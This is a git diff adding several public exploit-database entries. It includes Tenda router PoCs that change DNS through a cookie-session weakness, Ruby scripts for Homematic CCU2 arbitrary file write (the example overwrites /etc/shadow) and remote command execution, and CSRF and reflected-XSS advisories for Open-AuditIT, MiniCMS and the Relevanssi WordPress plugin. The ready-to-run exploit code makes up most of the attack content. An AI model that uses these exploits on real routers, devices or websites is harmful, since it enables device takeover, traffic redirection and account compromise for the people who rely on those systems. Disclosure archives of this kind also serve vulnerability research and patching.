diff --git a/exploits/asp/webapps/44373.txt b/exploits/asp/webapps/44373.txt new file mode 100644 index 000000000..af0e89aaf --- /dev/null +++ b/exploits/asp/webapps/44373.txt @@ -0,0 +1,63 @@ +# +# +# Tenda W308R v2 Wireless Router V5.07.48 +# Cookie Session Weakness Remote DNS Change PoC +# +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/asp/webapps/44377.txt b/exploits/asp/webapps/44377.txt new file mode 100644 index 000000000..da03ed75f --- /dev/null +++ b/exploits/asp/webapps/44377.txt @@ -0,0 +1,63 @@ +# +# +# Tenda W316R Wireless Router V5.07.50 +# Cookie Session Weakness Remote DNS Change PoC +# +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/asp/webapps/44380.txt b/exploits/asp/webapps/44380.txt new file mode 100644 index 000000000..555797776 --- /dev/null +++ b/exploits/asp/webapps/44380.txt @@ -0,0 +1,62 @@ +# +# +# Tenda W3002R/A302/w309r Wireless Router V5.07.64_en +# Cookie Session Weakness Remote DNS Change PoC +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/asp/webapps/44381.txt b/exploits/asp/webapps/44381.txt new file mode 100644 index 000000000..afdd8d0d4 --- /dev/null +++ b/exploits/asp/webapps/44381.txt @@ -0,0 +1,62 @@ +# +# +# Tenda FH303/A300 Firmware V5.07.68_EN +# Cookie Session Weakness Remote DNS Change PoC +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/cgi/webapps/44361.rb b/exploits/cgi/webapps/44361.rb new file mode 100755 index 000000000..f38e0c139 --- /dev/null +++ b/exploits/cgi/webapps/44361.rb @@ -0,0 +1,81 @@ +#!/usr/bin/ruby + +# Exploit Title: Homematic CCU2 Arbitrary File Write +# Date: 28-03-18 +# Exploit Author: Patrick Muench, Gregor Kopf +# Vendor Homepage: http://www.eq-3.de +# Software Link: http://www.eq-3.de/service/downloads.html?id=268 +# Version: 2.29.23 +# CVE : 2018-7300 + +# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite + +require 'net/http' +require 'net/https' +require 'uri' +require 'json' + +unless ARGV.length == 3 + STDOUT.puts <<-EOF +Please provide url + +Usage: + write_files.rb + +Example: + write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::' + + or + + write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::' + +EOF + exit +end + +# The first argument specifiee the URL and if http or https is used +url = ARGV[0] + "/api/homematic.cgi" + +# The second argument specifies the file into which the content should be written +homematic_file_path = ARGV[1] + +# The third argument specifies the content of the file +homematic_file_content = ARGV[2] + +# define the json body for the attack +body = { + "version": "1.1", + "method": "User.setLanguage", + "params": { + "userName": "file path", + "userLang": "file content" + } + }.to_hash + +# define the traversal with the file you want to write +body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000" + +# define the content +body[:params][:userLang] = homematic_file_content + +# split the uri to access it in a easier way +uri = URI.parse(url) + +# define target connection, disabling certificate verification +Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http| + + # define post request + request = Net::HTTP::Post.new(uri.request_uri) + + # define the content type of the http request + request.content_type = 'application/json' + + # define the request body + request.body = body.to_json + + # send the request to the homematic ccu2 + response = http.request(request) + + # print response message code and status to cli + puts 'Response code: ' + response.code + ' ' + response.message +end \ No newline at end of file diff --git a/exploits/cgi/webapps/44368.rb b/exploits/cgi/webapps/44368.rb new file mode 100755 index 000000000..60e8d255b --- /dev/null +++ b/exploits/cgi/webapps/44368.rb @@ -0,0 +1,61 @@ +#!/usr/bin/ruby + +# Exploit Title: Homematic CCU2 Remote Command Execution +# Date: 28-03-18 +# Exploit Author: Patrick Muench, Gregor Kopf +# Vendor Homepage: http://www.eq-3.de +# Software Link: http://www.eq-3.de/service/downloads.html?id=268 +# Version: 2.29.23 +# CVE : 2018-7297 + +# Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution + +require 'net/http' +require 'net/https' +require 'uri' + +unless ARGV.length == 2 + STDOUT.puts <<-EOF +Please provide url and the command, which is execute on the homematic + +Usage: + execute_cmd.rb + +Example: + execute_cmd.rb https://192.168.1.1 "cat /etc/shadow" + + or + + execute_cmd.rb http://192.168.1.1 "cat /etc/shadow" + +EOF + exit +end + +# The first argument specifies the URL and if http or https is used +url = ARGV[0] + "/Test.exe" + +# The second argument specifies the command which is executed via tcl interpreter +tcl_command = ARGV[1] + +# define body content +body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);" + +# split uri to access it in a easier way +uri = URI.parse(url) + +# define target connection, disabling certificate verification +Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http| + + # define post request + request = Net::HTTP::Post.new(uri.request_uri) + + # define the request body + request.body = body + + # send the request to the homematic ccu2 + response = http.request(request) + + # print response to cli + puts response.body +end \ No newline at end of file diff --git a/exploits/multiple/webapps/44360.txt b/exploits/multiple/webapps/44360.txt new file mode 100644 index 000000000..5a794f6ee --- /dev/null +++ b/exploits/multiple/webapps/44360.txt @@ -0,0 +1,69 @@ +# Exploit Title: Open-AuditIT Professional 2.1 - Cross-Site Request Forgery (CSRF) +# Date: 27-03-2018 +# Exploit Author: Nilesh Sapariya +# Contact: https://twitter.com/nilesh_loganx +# Website: https://nileshsapariya.blogspot.com +# Vendor Homepage: https://www.open-audit.org/ +# Software Link : https://www.open-audit.org/downloads.php +# Version: 2.1 +# CVE : CVE-2018-8979 +# Tested on: Windows 10 Pro +# Category: Webapp Open-AuditIT Professional 2.1 + + +1. Description:- +There is no CSRF protection in Open-AuditIT application, with a little help +of social engineering (like sending a link via email/chat) an attacker may +force the victim to click on a malicious link by which any normal user can +become an Admin user. The attack can force an end user to execute unwanted +actions on a web application in which they're currently authenticated. +Using this vulnerability, we were able to compromise entire user account +with chaining this bug with XSS. + + + +2. Proof of Concept +Login into Open-AuditIT Professional 2.1 +Step 1 :- Craft a HTML Page with XSS payload +Step 2:- Save this .html file and send it to victim (Victim should be +loggedin in the browser) +Crafted value will be added. + + +Affected Code: + + + +
+ + + + + + + + + +
+ + + + +​​3] POCs and steps: +https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html + + +Thanks & Regards, +Nilesh Sapariya +Security Researcher +https://twitter.com/nilesh_loganx +*https://nileshsapariya.blogspot.in \ No newline at end of file diff --git a/exploits/php/webapps/44362.html b/exploits/php/webapps/44362.html new file mode 100644 index 000000000..227fdba23 --- /dev/null +++ b/exploits/php/webapps/44362.html @@ -0,0 +1,36 @@ +<-- +# Exploit Title: MiniCMS 1.10 CSRF Vulnerability +# Date: 2018-03-28 +# Exploit Author: zixian(me@zixian.org、zixian@5ecurity.cn) +# Vendor Homepage: https://github.com/bg5sbk/MiniCMS +# Software Link: https://github.com/bg5sbk/MiniCMS +# Version: 1.10 +# CVE : CVE-2018-9092 + + + +There is a CSRF vulnerability that can change the administrator account password +After the administrator logged in, open the following page + poc: +--> + + + + test + +
+ + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/44366.txt b/exploits/php/webapps/44366.txt new file mode 100644 index 000000000..5d8052c6f --- /dev/null +++ b/exploits/php/webapps/44366.txt @@ -0,0 +1,46 @@ +# Exploit Title : Relevanssi Wordpress Search Plugin Reflected Cross Site Scripting (XSS) +# Date: 23-03-2018 +# Exploit Author : Stefan Broeder +# Contact : https://twitter.com/stefanbroeder +# Vendor Homepage: https://www.relevanssi.com +# Software Link: https://wordpress.org/plugins/relevanssi +# Version: 4.0.4 +# CVE : CVE-2018-9034 +# Category : webapps + +Description +=========== +Relevanssi is a WordPress plugin with more than 100.000 active installations. Version 4.0.4 (and possibly previous versions) are affected by a Reflected XSS vulnerability. + +Vulnerable part of code +======================= +File: relevanssi/lib/interface.php:1055 displays unescaped value of $_GET variable 'tab'. + +.. +1049 if( isset( $_REQUEST[ 'tab' ] ) ) { +1050 $active_tab = $_REQUEST[ 'tab' ]; +1051 } // end if +1052 +1053 if ($active_tab === "stopwords") $display_save_button = false; +1054 +1055 echo ""; +.. + +Impact +====== +Arbitrary JavaScript code can be run on browser side if a logged in WordPress administrator is tricked to click on a link or browse a URL under the attacker control. +This can potentially lead to creation of new admin users, or remote code execution on the server. + +Proof of Concept +============ +In order to exploit this vulnerability, the attacker needs to have the victim visit the following link: + +/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab='>